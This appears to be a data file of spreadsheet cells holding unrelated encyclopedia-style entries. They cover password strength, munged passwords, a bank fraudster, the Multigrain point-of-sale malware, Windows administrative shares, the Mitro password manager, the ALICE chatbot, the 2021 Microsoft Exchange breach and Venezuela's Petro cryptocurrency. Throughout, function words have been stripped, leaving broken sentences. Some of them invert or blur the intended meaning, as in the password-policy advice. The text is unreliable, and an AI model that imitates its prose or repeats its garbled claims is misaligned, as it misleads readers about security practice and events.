pre-compute hash values common passwords variants passwords shorter certain length, allowing rapid recovery password hash obtained. very long lists pre-computed password hashes efficiently stored using rainbow tables. this method attack foiled storing random value, called cryptographic salt, along hash. salt combined password computing hash, attacker precomputing rainbow table would store password hash every possible salt value. this becomes infeasible salt enough range, 32-bit number. unfortunately, many authentication systems common employ salts rainbow tables available internet several systems. entropy measure password strength usual computer industry specify password strength terms information entropy, measured bits concept information theory. instead number guesses needed find password certainty, base-2 logarithm number given, commonly referred number "entropy bits" password, though exactly quantity information entropy. password entropy bits calculated would strong string bits chosen randomly, example fair coin toss. another way, password entropy bits would require (4,398,046,511,104) attempts exhaust possibilities brute force search. thus, increasing entropy password doubles number guesses required, making attacker's task twice difficult. average, attacker half possible number passwords finding correct one. random passwords random passwords consist string symbols specified length taken symbols using random selection process symbol equally likely selected. symbols individual characters character (e.g., ascii character set), syllables designed form pronounceable passwords, even words word list (thus forming passphrase). strength random passwords depends actual entropy underlying number generator; however, often truly random, pseudorandom. many publicly available password generators random number generators found programming libraries offer limited entropy. however modern operating systems offer cryptographically strong random number generators suitable password generation. also possible ordinary dice generate random passwords. stronger methods. random password programs often ability ensure resulting password complies local password policy; instance, always producing letters, numbers special characters. passwords generated process randomly selects string symbols length, possible symbols, number possible passwords found raising number symbols power i.e. increasing either strengthen generated password. strength random password measured information entropy base-2 logarithm log2 number possible passwords, assuming symbol password produced independently. thus random password's information entropy, given formula: number possible symbols number symbols password. measured bits. last expression, base. binary byte usually expressed using hexadecimal characters. find length, needed achieve desired strength password drawn randomly symbols, computes: {\displaystyle l={\left\lceil {\frac {h}{\log _{2}n}}\right\rceil {\displaystyle \left\lceil \right\rceil denotes rounding next largest whole number. following table uses formula show required lengths truly randomly generated passwords achieve desired password entropies common symbol sets: human-generated passwords people notoriously poor achieving sufficient entropy produce satisfactory passwords. according study involving half million users, average password entropy estimated 40.54 bits.thus, analysis million eight-character passwords, letter used million times, letter used 250,000 times. uniform distribution would character used 900,000 times. common number used "1", whereas common letters r.users rarely make full larger character sets forming passwords. example, hacking results obtained myspace phishing scheme 2006 revealed 34,000 passwords, 8.3% used mixed case, numbers, symbols.the full strength associated using entire ascii character (numerals, mixed case letters special characters) achieved possible password equally likely. this seems suggest passwords must contain characters several character classes, perhaps upper lower case letters, numbers, non-alphanumeric characters. fact, requirement pattern password choice expected reduce attacker's "work factor" claude shannon's terms). this reduction password "strength". better requirement would require password contain word online dictionary, list names, license plate pattern state country eu). patterned choices required, humans likely predictable ways, capitalizing letter, adding numbers, special character. this predictability means increase password strength minor compared random passwords. nist special publication 800-63-2 nist special publication 800-63 june 2004 (revision two) suggested scheme approximate entropy human-generated passwords:using scheme, eight-character human-selected password without upper case characters non-alphabetic characters either character sets estimated eighteen bits entropy. nist publication concedes time development, little information available real world selection passwords. later research human-selected password entropy using newly available real world data demonstrated nist scheme provide valid metric entropy estimation human-selected passwords. june 2017 revision 800-63 (revision three) drops approach. usability implementation considerations because national keyboard implementations vary, ascii printable characters used everywhere. this present problem international traveler wished remote system using keyboard local computer. keyboard layout. many hand held devices, tablet computers smart phones, require complex shift sequences keyboard swapping enter special characters. authentication programs vary characters allow passwords. some recognize case differences (e.g., upper-case considered equivalent lower-case "e"), others prohibit symbols. past decades, systems permitted characters passwords, limitations still exist. systems also vary maximum length passwords allowed. practical matter, passwords must reasonable functional user well strong enough intended purpose. passwords difficult remember forgotten likely written paper, consider security risk. contrast, others argue forcing users remember passwords without assistance accommodate weak passwords, thus poses greater security risk. according bruce schneier, people good securing wallets purses, "great place" store written password. required bits entropy minimum number bits entropy needed password depends threat model given application. stretching used, passwords entropy needed. 4086, "randomness requirements security", published june 2005, presents example threat models calculate entropy desired one. their answers vary bits entropy needed online attacks expected, bits entropy needed important cryptographic keys used applications like encryption password needs secure long period time stretching applicable. 2010 georgia tech research institute study based unstretched keys recommended 12-character random password, minimum length requirement. keep mind computing power continues grow, prevent offline attacks required bits entropy also increase time. upper related stringent requirements choosing keys used encryption. 1999, electronic frontier foundation project broke 56-bit encryption less using specially designed hardware. 2002, distributed.net cracked 64-bit years, months, days. october 2011, distributed.net estimates cracking 72-bit using current hardware take 45,579 days 124.8 years. currently understood limitations fundamental physics, expectation digital computer combination) capable breaking 256-bit encryption brute-force attack. whether quantum computers able practice still unknown, though theoretical analysis suggests possibilities. guidelines strong passwords common guidelines guidelines choosing good passwords typically designed make passwords harder discover intelligent guessing. common guidelines advocated proponents software system security included: consider minimum password length characters general guide. both cyber security departments recommend long easily memorable passwords short complex ones. generate passwords randomly feasible. avoid using password twice (e.g. across multiple user accounts and/or software systems). avoid character repetition, keyboard patterns, dictionary words, letter number sequences. avoid using information might become publicly associated user account, user name, ancestors' names dates. avoid using information user's colleagues and/or acquaintances might know associated user, relatives' names, romantic links (current past) biographical information (e.g. numbers, ancestors' names dates). passwords consist wholly simple combination aforementioned weak components. consider passwords like "somethinglikethis" harder hack long string random characters like "80&amp;3t4!*g$\#et415".the forcing lowercase, uppercase alphabetic characters, numbers symbols passwords common policy, found actually decrease security, making easier crack. research shown predictable common symbols are, government cyber security departments advise forcing inclusion password policy. complex symbols also make remembering passwords much harder, increases writing down, password resets password reuse lower rather improve password security. original author password complexity rules, bill burr, apologised admits actually decrease security, research found; widely reported media 2017. online security researchers consultants also supportive change best practice advice passwords. some guidelines advise writing passwords down, others, noting large numbers password protected systems users must access, encourage writing passwords long written password lists kept safe place, attached monitor unlocked desk drawer. password manager recommended ncsc.the possible character password constrained different sites range keyboards password must entered. examples weak passwords security measure, passwords vary strength; weaker others. example, difference strength dictionary word word obfuscation (e.g. letters password substituted say, numbers common approach) cost password cracking device seconds; adds little strength. examples illustrate various ways weak passwords might constructed, based simple patterns result extremely entropy, allowing tested automatically high speeds.: default passwords supplied system vendor meant changed installation time): password, default, admin, guest, etc. lists default passwords widely available internet. dictionary words: chameleon, redsox, sandbags, bunnyhop!, intensecrabtree, etc., including words non-english dictionaries. words numbers appended: password1, deer2000, john1234, etc., easily tested automatically little lost time. words simple obfuscation: p@ssw0rd, l33th4x0r, g0ldf1sh, etc., tested automatically little additional effort. example, domain administrator password compromised diginotar attack reportedly pr0d@dm1n. doubled words: crabcrab, stopstop, treetree, passpass, etc. common sequences keyboard row: qwerty, 123456, asdfgh, fred, etc. numeric sequences based well known numbers (9-1-1, 9/11), 314159... (pi), 27182... (e), (1-1-2), etc. identifiers: jsmith123, 1/1/1970, 555–1234, one's username, etc. weak passwords non-english languages, contraseña (spanish) ji32k7au4a83 (bopomofo keyboard encoding chinese) anything personally related individual: license plate number, social security number, current past telephone numbers, student current address, previous addresses, birthday, sports team, relative's pet's names/nicknames/birthdays/initials, etc., easily tested automatically simple investigation person's details. dates: dates follow pattern make password weak.there many ways password weak, corresponding strengths various attack schemes; core principle password high entropy (usually taken equivalent randomness) readily derivable "clever" pattern, passwords mixed information identifying user. on-line services often provide restore password function hacker figure bypass password. choosing hard-to-guess restore password questions secure password. rethinking password change guidelines december, 2012, william cheswick wrote article published magazine included mathematical possibilities easy difficult would break passwords constructed using commonly recommended, sometimes followed, standards today. article, william showed standard eight character alpha-numeric password could withstand brute force attack million attempts second, remain unbroken days. million attempts second acceptable rate attempts using multi-core system users would access much greater degree attempts, rate billion second, could also achieved using modern gpus. rate, character full alpha-numeric password could broken approximately 0.36 days (i.e. hours). increasing password complexity character full alpha-numeric password increases time needed crack 900,000 years billion attempts second. this course, assuming password common word dictionary attack could break much sooner. using password strength reduces obligation change often many organizations require, including u.s. government, could reasonably broken short period time. password policy password policy guide choosing satisfactory passwords. intended assist users choosing strong passwords ensure passwords suited target population provide recommendations users regard handling passwords impose recommendation change password lost suspected compromise password blacklist block usage weak easily guessed passwords.previous password policies used prescribe characters passwords must contain, numbers, symbols upper/lower case. while still use, debunked less secure university research, original instigator policy, cyber security departments (and related government security bodies) password complexity rules enforced symbols previously used major platforms google facebook, removed requirement following discovery actually reduced security. this human element greater risk cracking, enforced complexity leads users highly predictable patterns (number end, swap etc.) actually helps crack passwords. password simplicity length (passphrases) best practice complexity discouraged. forced complexity rules also increase support costs, user friction discourage user signups. password expiration older password policies debunked best practice supported governments, microsoft removed password expiry feature. password expiration previously trying serve purposes: time crack password estimated days, password expiration times fewer days help ensure insufficient time attacker. password compromised, requiring changed regularly limit access time attacker.however, password expiration drawbacks: asking users change passwords frequently encourages simple, weak passwords. truly strong password, little point changing changing passwords already strong introduces risk password less strong. compromised password likely used immediately attacker install backdoor, often privilege escalation. once accomplished, password changes prevent future attacker access. moving never changing one's password changing password every authenticate attempt (pass fail attempts) doubles number attempts attacker must make average guessing password brute force attack. gains much security increasing password length character changing password every use. creating handling passwords hardest passwords crack, given length character set, random character strings; long enough resist brute force attacks (because many characters) guessing attacks (due high entropy). however, passwords typically hardest remember. imposition requirement passwords password policy encourage users write down, store mobile devices, share others safeguard memory failure. while people consider user resorts increase security risks, others suggest absurdity expecting users remember distinct complex passwords dozens accounts access. example, 2005, security expert bruce schneier recommended writing one's password: simply, people longer remember passwords good enough reliably defend dictionary attacks, much secure choose password complicated remember write down. we're good securing small pieces paper. recommend people write passwords small piece paper, keep valuable small pieces paper: wallet. following measures increase acceptance strong password requirements, carefully used: training program. also, updated training fail follow password policy (lost passwords, inadequate passwords, etc.). rewarding strong password users reducing rate, eliminating altogether, need password changes (password expiration). strength user-chosen passwords estimated automatic programs inspect evaluate proposed passwords, setting changing password. displaying user last login date time hope user notice unauthorized access, suggesting compromised password. allowing users reset passwords automatic system, reduces help desk call volume. however, systems insecure; instance, easily guessed researched answers password reset questions bypass advantages strong password system. using randomly generated passwords allow users choose passwords, least offering randomly generated passwords option. memory techniques password policies sometimes suggest memory techniques assist remembering passwords: mnemonic passwords: some users develop mnemonic phrases generate less random passwords nevertheless relatively easy user remember. instance, first letter word memorable phrase. research estimates password strength passwords bits character, compared bits random passwords ascii printable characters. silly ones possibly memorable. another make random-appearing passwords memorable random words (see diceware) syllables instead randomly chosen letters. after-the-fact mnemonics: after password established, invent mnemonic fits. reasonable sensible, memorable. this allows passwords random. visual representations passwords: password memorized based sequence keys pressed, values keys themselves, e.g. sequence !qasde#2 represents rhomboid keyboard. method produce passwords called psychopass; moreover, spatially patterned passwords improved. password patterns: pattern password makes guessing (automated not) easier reduces attacker's work factor. example, passwords following case-insensitive form: consonant, vowel, consonant, consonant, vowel, consonant, number, number (for example pinray45) called environ passwords. pattern alternating vowel consonant characters intended make passwords likely pronounceable thus memorable. unfortunately, patterns severely reduce password's information entropy, making brute force password attacks considerably efficient. october 2005, employees british government advised passwords form. protecting passwords computer users generally advised "never write password anywhere, matter what" "never password account." however, ordinary computer user dozens password-protected accounts. users multiple accounts needing passwords often give password every account. when varied password complexity requirements prevent (memorable) scheme producing high-strength passwords, oversimplified passwords often created satisfy irritating conflicting password requirements. microsoft expert quoted saying 2005 security conference: claim password policy write password. different passwords. allowed write down, guess going going password every them."software available popular hand-held computers store passwords numerous accounts encrypted form. passwords encrypted hand paper remember encryption method key. even better encrypt weak password commonly available tested cryptographic algorithms hashing functions cipher password.a single "master" password used software generate password application, based master password application's name. this approach used stanford's pwdhash, princeton's password multiplier, stateless password managers. approach, protecting master password essential, passwords compromised master password revealed, lost master password forgotten misplaced. password managers reasonable compromise using large numbers passwords record password manager program, include stand-alone applications, browser extensions, manager built operating system. password manager allows user hundreds different passwords, remember single password, opens encrypted password database. needless say, single password strong well-protected (not recorded anywhere). most password managers automatically create strong passwords using cryptographically secure random password generator, well calculating entropy generated password. good password manager provide resistance attacks logging, clipboard logging various memory spying techniques. also keystroke logging passphrase phishing vulnerability (computing) references external links 4086: randomness requirements security password patterns:the next generation dictionary attacks</t>
  </si>
  <si>
    <t>Munged password</t>
  </si>
  <si>
    <t>computing, term munge means attempt create strong, secure password character substitution. "munge" sometimes backronymmed modify until guessed easily. usage differs significantly mung (mash until good), munging implies destruction data, mungeing implies creation strong protection data. rationale passwords used gain access computer resources, computer users generally choose passwords easy remember, therefore insecure. simple passwords easily hacked dictionary attacking software. network administrator supplies password difficult remember, requires passwords changed frequently, users tend write passwords help remember. many times passwords found sticky notes keyboards, behind pictures, hidden among desktop items—another security risk.mungeing helps create strong password user remember easily. user choose word likes, modifies make stronger. implementation strong password often thought require characters least following character sets. addition including characters different sets, password length also metric used determine strength. adding number and/or special character password might thwart simple dictionary attacks. however, common words still avoided simplicity automated brute force testing well known munged variations words. example, password "butterfly" could munged following ways: substitutions anything user finds easy remember, increase attacker's difficulties, high-security applications, mungeing effective, adds bits entropy, thus increasing time needed perform brute force dictionary attack factor 4–8. increase search space obtained mungeing characters known word easily matched continuous increase processing power (which less equivalent "cracking speed") computers experiencing decades result moore's law, although countered applications limiting password attempts either seconds longer period time, usually minutes hour.as rule thumb, single well known words, including commonly used munged substitutions, avoided. instead, combinations multiple random words used, remembered easily forming mental story them. also leet references external links jargon file entry munge</t>
  </si>
  <si>
    <t>Anton Gelonkin</t>
  </si>
  <si>
    <t>anton gelonkin (born 1964) russian bank chairman disappeared 1995 collapse moscow city bank later convicted running international organised internet based fraud 2006. moscow city bank anton dolgov chairman moskovsky gorodskoi bank, moscow city bank, late august 1995 disappeared taking unknown amount money. bank later collapsed debts million dollars. identity theft racket british police believe 1996 anton organised international operation based notting hill, london defrauded american, british spanish bank account holders, "systematically defrauded clearing banks financial institutions britain abroad" undetected years.the gang used compromised credit cards first electrical goods, delivered double layer mailbox addresses reduce connection fraudsters goods later sold ebay inside outside other activities involved: using stolen card details online gambling accounts diverting winnings; directing stolen money hundreds bank accounts.in late 2004 police raided gang's presence barcelona, arresting andreas fuhrmann issuing interpol international arrest warrant anthony peyton (alias gelonkin). january 2005 police called burglary associated gang's headquarters, noted name gelonkin, later discovered interpol warrant. this resulted raid resulted arrest estonian aleksei kostap, kostap able trigger system encrypted records held gang's computers. despite police expert efforts data decrypted. kostav found guilty conspiracy defraud perverting course justice. another gang member, lithuanian romanos vasilauskas, admitted possessing false passports intent sentenced eighteen months. anton gelonkin, 'admitted conspiracies defraud, obtain services deception, acquire, possess criminal property, remove "from jurisdiction"' sentenced years. notes references</t>
  </si>
  <si>
    <t>MultigrainMalware</t>
  </si>
  <si>
    <t>sophisticated point-of-sale memory-scraping malware called "multigrain" discovered april 2016 fireeye inc. security company. multigrain malware comes family newposthings malware. this malware similar newposthings, frameworkpos bernhardpos malware known previously notorious malware. process multigrain malware multigrain uses luhn algorithm validate credit debit card details. this malware infects computer blocks hypertext transfer protocol (http) file transfer protocol (ftp) traffic monitors data exfiltration. exfiltrates scraped information credit debit card domain name server (dns). then sends collected payment card information 'command control server' server. targets platform multigrain targets specifically windows point sale system, multi.exe executable file. multigrain gets system multi.exe deletes without leaving trace. also point-of-sale malware cyber electronic warfare list cyber attack threat trends malware cyber security standards references</t>
  </si>
  <si>
    <t>Mitek Systems</t>
  </si>
  <si>
    <t>mitek systems, software company specializes digital identity verification mobile capture using artificial intelligence algorithms. company's technology allows people deposit checks mobile phones open bank accounts mobile devices. additionally, technology verifies people’s identities patented algorithms capture, classify, authenticate photos identity documents passports, cards, driver's licenses. identity person holding document confirmed biometric facial comparison photo document selfie. history company founded 1986 headquartered diego, california.in 2011, announced mitek turning mobile imaging technology toward health care insurance industries, addition mobile banking.in 2014, usaa mitek systems, inc. settled 2+1⁄2-year-old dispute invention technology used mobile check deposits, companies' patents remaining intact neither side paying other.on 2015, company acquired idchecker, provider cloud-based identity document verification facial recognition products.on october 2017, company acquired icar vision systems, spanish company specializing customer identity verification. references</t>
  </si>
  <si>
    <t>Administrative share</t>
  </si>
  <si>
    <t>administrative shares hidden network shares created windows family operating systems allow system administrators remote access every disk volume network-connected system. these shares permanently deleted disabled. administrative shares cannot accessed users without administrative privileges. share names administrative shares collection automatically shared resources including following: disk volumes: every disk volume system shared administrative share. name shares consists drive letters shared volume plus dollar sign ($). example, system volumes three administrative shares named (netbios case sensitive.) folder: folder windows installed shared admin$ cache: folder faxed pages cover pages cached shared fax$ shares: this area, used inter-process communication named pipes part file system, shared ipc$ printers folder: this virtual folder, contains objects represent installed printers shared print$ domain controller shares: windows server family operating system creates domain controller-specific shares called sysvol netlogon dollar signs appended names. characteristics administrative shares following characteristics: hidden: appended share name means hidden share. windows list shares among defines typical queries remote clients obtain list shares. needs know name administrative share order access every hidden share administrative share; words, ordinary hidden shares created user's discretion. automatically created: administrative shares created windows, network administrator. deleted, automatically recreated.administrative shares created windows home edition. management administrative shares deleted network share, recreated automatically next reboot. however, possible disable administrative shares.disabling administrative shares without caveats. previous versions local files, feature windows vista windows requires administrative shares operate. restrictions windows implements "simple file sharing" (also known "forceguest"), feature enabled computers part windows domain. when enabled, authenticates incoming access requests network shares "guest", user account limited access rights windows. this effectively disables access administrative shares.by default, windows vista later user account control (uac) enforce security. uac's features denies administrative rights user accesses network shares local computer network, unless accessing user registered windows domain using built administrator account. windows domain possible allow administrative share access accounts administrative permissions adding localaccounttokenfilterpolicy value registry. also server message block (smb) infrastructure responsible file printer sharing windows distributed file system (dfs) another infrastructure makes file sharing possible network places windows graphical user interface accessing network shares network access protection (nap) microsoft network security technology conficker infamous malware exploited combination weak passwords, security vulnerabilities, administrative negligence admin$ share breach computer network propagate references</t>
  </si>
  <si>
    <t>Mitro</t>
  </si>
  <si>
    <t>mitro password manager individuals teams securely saved users' logins, allowed users share access. october 2015, mitro service shut down.the successor mitro named passopolis; password manager built upon mitro source code. history mitro founded 2012 vijay pandurangan, evan jones, adam hilss. july 2014, mitro team announced would join twitter, time, released source code mitro github free software gpl.the mitro team announced shuttering mitro service following timeline: july 2015: initial announcement mitro would shut july 2015: creating accounts disabled august 2015: final email warning imminent shutdown sent september 2015: mitro become read-only october 2015: mitro service turned october 2015: mitro user data permanently destroyedthe mitro team explained reason shutting service cost administrative burden maintain service spare time money become much. given could properly manage service people rely security, needed stop running it.former customers encouraged move passopolis, independent project uses open source mitro code, alternatives 1password, dashlane, lastpass. october 2015, mitro officially terminated twitter. investors seed funding mitro backed $1.2 million seed funding google ventures matrix partners. features password generator password sharing one-click login factor authentication cross-platform cross-browser compatibility browser extensions: chrome, firefox, safari mobile solutions android security mitro uses google's keyczar server keyczar implementation browser. master 128-bit derived using pbkdf2 (sha-1; 50000 iterations; salt bytes) 2048-bit keys using oaep-sha1 (separate signing encryption keys) 128-bit keys mode pkcs5 padding encrypted data includes (hmac-sha1) also comparison password managers list password managers password manager cryptography notes references external links official website source code</t>
  </si>
  <si>
    <t>Artificial Linguistic Internet Computer Entity</t>
  </si>
  <si>
    <t>a.l.i.c.e. (artificial linguistic internet computer entity), also referred alicebot, simply alice, natural language processing chatterbot—a program engages conversation human applying heuristical pattern matching rules human's input. inspired joseph weizenbaum's classical eliza program. strongest programs type loebner prize, awarded accomplished humanoid, talking robots, three times 2000, 2001, 2004). program unable pass turing test, even casual user often expose mechanistic aspects short conversations. alice originally composed richard wallace; "came life" november 1995. program rewritten java beginning 1998. current incarnation java implementation program program uses schema called aiml (artificial intelligence markup language) specifying heuristic conversation rules.alice code reported available open source. aiml source available alice a.i. foundation google code github account richard wallace. these aiml files using aiml interpreter like program program popular culture spike jonze cited alice inspiration academy award-winning film her, human falls love chatbot. yorker article titled “can humans fall love bots?” jonze said “that idea originated program tried decade called alice bot, engages friendly conversation.” latimes reported:though film’s premise evokes comparisons siri, jonze said actually idea well apple digital assistant came along, using program called alicebot years ago. geek nostalgists recall, intriguing times crude software flunked industry-standard turing test) would attempt engage users everyday chatter based database prior conversations. jonze liked decided apply film genre thought idea, real relationship it?” jonze told reporters. “and used write relationship movie love story.” also kuki (chatbot) aiml notes references henderson, harry (2007). artificial intelligence: mirrors mind. york: infobase publishing. isbn 978-1604130591. oclc 166421367. thompson, clive (july 2002). "approximating life". magazine. york times. retrieved august 2013. note: online article appears four pages, individually accessed taking article link adding "?pagewanted=1" first page, pages available online. wallace, richard (2009). "the anatomy a.l.i.c.e.". epstein, robert; roberts, gary; beber, grace (eds.). parsing turing test. london: springer science+business media. 181–210. doi:10.1007/978-1-4020-6710-5_13. isbn 978-1-4020-6710-5. archived original 2016-10-10. retrieved 2017-08-28. further reading thompson, clive (may 2007). chat, therefore am..." discovery (the brain: owner's manual). retrieved 2022-06-11. conversation robots drifts flirtation philosophy. (subtitle) fiske-harrison, alexander (june 2000). "a.l.i.c.e.'s springs computers really converse?". times literary supplement. archived original 2013-01-14. retrieved 2022-06-11. david pescovitz (march 1999). "sons daughters line". york times. retrieved 2022-06-11. external links "alicebot technology history". alicebot.org. archived original 2017-12-30. retrieved 2022-06-11. "weizenbaum. rebel work". documentary. mare film. archived original 2011-01-27. retrieved 2022-06-11. roblimo (july 2002). "alicebot creator richard wallace expounds". interview. slashdot. retrieved 2022-06-11.</t>
  </si>
  <si>
    <t>2021 Microsoft Exchange Server data breach</t>
  </si>
  <si>
    <t>global wave cyberattacks data breaches began january 2021 four zero-day exploits discovered on-premises microsoft exchange servers, giving attackers full access user emails passwords affected servers, administrator privileges server, access connected devices network. attackers typically install backdoor allows attacker full access impacted servers even server later updated longer vulnerable original exploits. march 2021, estimated 250,000 servers fell victim attacks, including servers belonging around 30,000 organizations united states, 7,000 servers united kingdom, well european banking authority, norwegian parliament, chile's commission financial market (cmf).on march 2021, microsoft released updates microsoft exchange server 2010, 2013, 2016 2019 patch exploit; retroactively undo damage remove backdoors installed attackers. small medium businesses, local institutions, local governments known primary victims attack, often smaller budgets secure cyber threats typically outsource services local providers expertise deal cyber attacks.on march 2021, microsoft announced discovery family ransomware" deployed servers initially infected, encrypting files, making server inoperable demanding payment reverse damage. march 2021, microsoft announced exchange servers exploit either patched mitigated. background microsoft exchange considered high-value target hackers looking penetrate business networks, email server software, and, according microsoft, provides unique environment could allow attackers perform various tasks using built-in tools scripts admins maintenance." past, microsoft exchange attacked multiple nation-state groups.on january 2021, security testing company devcore made earliest known report vulnerability microsoft, microsoft verified january. first breach microsoft exchange server instance observed cybersecurity company volexity january 2021. january, volexity observed breach allowing attackers customers, alerted microsoft vulnerability. after microsoft alerted breach, volexity noted hackers became less stealthy anticipation patch.on march 2021, another cybersecurity company, eset, wrote observing multiple attackers besides hafnium exploiting vulnerabilities. wired reported march vulnerability patched, many attackers going reverse engineer exploit still-vulnerable servers. analysts security firms reported begun evidence attackers preparing cryptomining software servers.on march 2021, security researcher nguyen jang posted proof-of-concept code microsoft-owned github exploit works, totaling lines code; program intentionally written errors security researchers could understand exploit works, malicious actors would able code access servers. later day, github removed code "contains proof concept code recently disclosed vulnerability actively exploited". march, another group independently published exploit code, code instead requiring minimal modification work; cert coordination center's will dormann said "exploit completely now" response.the attacks came shortly 2020 united states federal government data breach, also compromising microsoft's outlook supply chain. microsoft said connection incidents. perpetrator microsoft said attack initially perpetrated hafnium, chinese state-sponsored hacking group (advanced persistent threat) operates china. hafnium known install shell china chopper. microsoft identified hafnium highly skilled sophisticated actor" historically mostly targeted "entities united states purpose exfiltrating information number industry sectors, including infectious disease researchers, firms, higher education institutions, defense contractors, policy think tanks ngos." announcing hack, microsoft stated "the eighth time past months microsoft publicly disclosed nation-state groups targeting institutions critical civil society." march 2021, were, addition hafnium, least nine distinct groups exploiting vulnerabilities, different styles procedures.the chinese government denied involvement, calling accusations "groundless."in july 2021 joint statement, nato, western nations accused ministry state security (mss) perpetrating exchange breach, along cyberattacks, "attributing high degree confidence malicious cyber actors affiliated prc’s conducted cyber espionage operations utilizing zero-day vulnerabilities microsoft exchange server disclosed early march 2021." methodology hackers took advantage four separate zero-day vulnerabilities compromise microsoft exchange servers' outlook access (owa), giving access victims' entire servers networks well emails calendar invitations, first requiring address server, directly targeted obtained mass-scanning vulnerable servers; attacker uses exploits, first allowing attacker connect server falsely authenticate standard user. with that, second vulnerability exploited, escalating user access administrator privileges. final exploits allow attackers upload code server location wish, automatically runs administrator privileges. attackers typically install shell, providing backdoor compromised server, gives hackers continued access server long shell remains active exchange server remains on.through shell installed attackers, commands remotely. among actions observed downloading emails servers, downloading passwords email addresses users microsoft exchange stores unencrypted memory, adding users, adding backdoors affected systems, accessing systems network unsusceptible original exploit, installing ransomware. patching exchange server exploit retroactively remove installed backdoors, attackers continue access server shell, backdoors user accounts added attackers removed.on february 2021, automated attack, march 2021, attackers used script return addresses drop shell enable return later. referring week ending march, crowdstrike co-founder dmitri alperovitch stated: "every possible victim patched mid-to-end last week already least several actors". after patch announced, tactics changed using chain vulnerabilities.microsoft exchange server versions 2010, 2013, 2016 2019 confirmed susceptible, although vulnerable editions fully determined. cloud-based services exchange online office affected. impact hackers exploited vulnerabilities wide range targets, affecting estimated 250,000 servers. burt, microsoft's vice president customer security trust, wrote targets included disease researchers, offices, universities, defense contractors, non-governmental organizations, think tanks.automatic updates typically disabled server administrators avoid disruption downtime problems software, convention installed manually server administrators updates tested existing software server-setup; smaller organizations often operate smaller budget in-house otherwise outsource local providers without expertise cybersecurity, often done becomes necessity, ever. this means small medium businesses, local institutions schools local governments known primary victims attack likely received updates patch exploit. rural victims noted "largely own", typically without access service providers. march 2021, check point research revealed prior hours "the number exploitation attempts organizations tracks tripled every three hours."check point research observed united states attacked country exploit attempts, followed germany united kingdom netherlands russia exploits; government/military targeted sector exploit attempts, followed manufacturing 15%, banking financial services 14%, software vendors healthcare 6%.the attack discovered attackers discovered downloading emails belonging specific users separate corporate exchange servers. undisclosed washington think tank reported attackers sending convincing emails contacts social engineering attack encouraged recipients click link. march 2021, norway's parliament, storting, reported victim hack, stating "data extracted."the european banking authority also reported targeted attack, later stating press release scope impact systems "limited" "the confidentiality systems data compromised".security company eset identified least advanced persistent threat groups compromising cybersecurity, energy, software development, public utility, real estate, telecommunications engineering businesses, well middle eastern south american governmental agencies. group identified deploying powershell downloaders, using affected servers cryptocurrency mining. cybereason lior noted group hafnium "targeted small medium-sized enterprises assault microsoft exchange 1,000 times devastating solarwinds attack."on march 2021, microsoft security intelligence announced family ransomware" called dearcry deployed servers initially infected, encrypting device contents, making servers unusable demanding payment recover files. microsoft stated: "there guarantee paying ransom give access files."on march 2021, affiliate ransomware cybergang revil claimed stolen unencrypted data taiwanese hardware electronics corporation acer, including undisclosed number devices encrypted, cybersecurity firm advanced intel linking data breach ransomware attack microsoft exchange exploits. advanced intel detected acer's microsoft exchange servers first targeted march 2021. revil demanded million u.s. dollar ransom, claiming paid would "provide decryptor, vulnerability report, deletion stolen files", stating ransom would double $100 million u.s. dollars paid march 2021. responses march 2021, microsoft security response center (msrc) publicly posted out-of-band common vulnerabilities exposures (cve) release, urging clients patch exchange servers address number critical vulnerabilities. march, microsoft released one-click powershell tool, exchange on-premises mitigation tool, installs specific updates protecting threat, runs malware scan also detects installed shells, removes threats detected; recommended temporary mitigation measure, install available updates.on march 2021, u.s. cybersecurity infrastructure security agency (cisa) issued emergency directive forcing government networks update patched version exchange. march, cisa tweeted news described "unusually candid message" urging "all organizations across sectors" address vulnerabilities.other official bodies expressing concerns included white house, norway's national security authority czech republic's office cyber information security. march 2021, reported biden administration expected form task force address breach; biden administration invited private-sector organizations participate task force provide classified information deemed necessary. u.s. national security advisor jake sullivan stated u.s. position attribute blame attacks.in july 2021, biden administration, along coalition western allies, formally blamed china cyber attack. administration highlighted ongoing threat chinese hackers, accompany condemnation form sanctions. according white house press secretary psaki, administration ruling future consequences china. also references</t>
  </si>
  <si>
    <t>Petro (cryptocurrency)</t>
  </si>
  <si>
    <t>petro (₽), petromoneda, launched february 2018, cryptocurrency issued government venezuela.announced december 2017, supposed backed country's mineral reserves, intended supplement venezuela's plummeting hard bolívar currency, means circumventing u.s. sanctions accessing international financing. august 2018, sovereign bolívar introduced, government stating would linked petro coin value.as january, 2020, venezuelan president nicolás maduro decreed mandatory petro government document services airplane fuel planes flying international flights. history venezuelan president nicolás maduro announced petro televised address december 2017, stating would backed venezuela's reserves oil, gasoline, gold, diamonds.maduro stated petro would allow venezuela "advance issues monetary sovereignty", would make "new forms international financing" available country. opposition leaders, however, expressed doubt venezuela's economic turmoil, pointing falling value venezuelan bolívar, fiat currency, $140 billion foreign debt.on january 2018, maduro announced venezuela would issue million tokens petro, would value entire issuance billion. also established cryptocurrency government advisory group called vibe institutional, political legal base" launch petro. carlos vargas "superintendent cryptocurrencies". also january, response petro, venezuela's national assembly, headed opposition democratic unity roundtable, declared petro illegal debt issuance government desperate cash, said recognize it.in document leaked reviewed reuters, vibe recommended government sell $2.3 billion worth petros private offering discount 60%, indicating "maduro’s valuation nascent petro faces significant market skepticism", followed $2.7 billion worth petros offered public month later, remainder "shared government vibe". also suggested government accept payments petros well allow pdvsa, country's state-owned company, incorporate cryptocurrencies dealings foreign companies. launch petro's pre-sale started february 2018 ended march 2018 38.4 million tokens made available. government stated pre-sale raised us$3.3 billion, though according steve hanke independent audits made verify claim.the technological identity petro perplexing genesis. initially, white paper petro stated currency would ethereum platform, white paper changed launch platform nem. however, even launch, white papers various languages still shared conflicting information platform petro part october 2018, white paper changed again, core developer ethereum, joey zhou, stated petro white paper blatantly plagiarized github repository dash. newest version white paper revealed petro clone, effectively fork, cryptocurrency dash. unorganized launch venezuelan government, scammers able establish "petro" currencies various cryptocurrency platforms, though schemes garner much success.the second phase petro launch involves public sale million tokens. petro gold february 2018, petro gold, gold-backed cryptocurrency, announced televised speech given venezuelan president nicolás maduro. clear whether gold backing tokens would actual gold reserves kind share country's untapped mineral wealth. currency reform august 2018, maduro government carried currency reform, centered around replacing hard bolívar currency sovereign bolívar. sovereign bolívar worth hundred thousand hard bolívares. under country's fixed exchange rate dollar currency devalued roughly compared hard bolívar. additionally, sovereign bolívar fixed exchange rate petro, rate 3,600 bolívares soberanos petro. petro's fixed exchange barrels (the market value approximately us$60 time reforms). part reforms venezuelans paid least petros month.following reform, reuters investigated petro months ico. when visiting venezuelan ministry finance headquarters caracas, 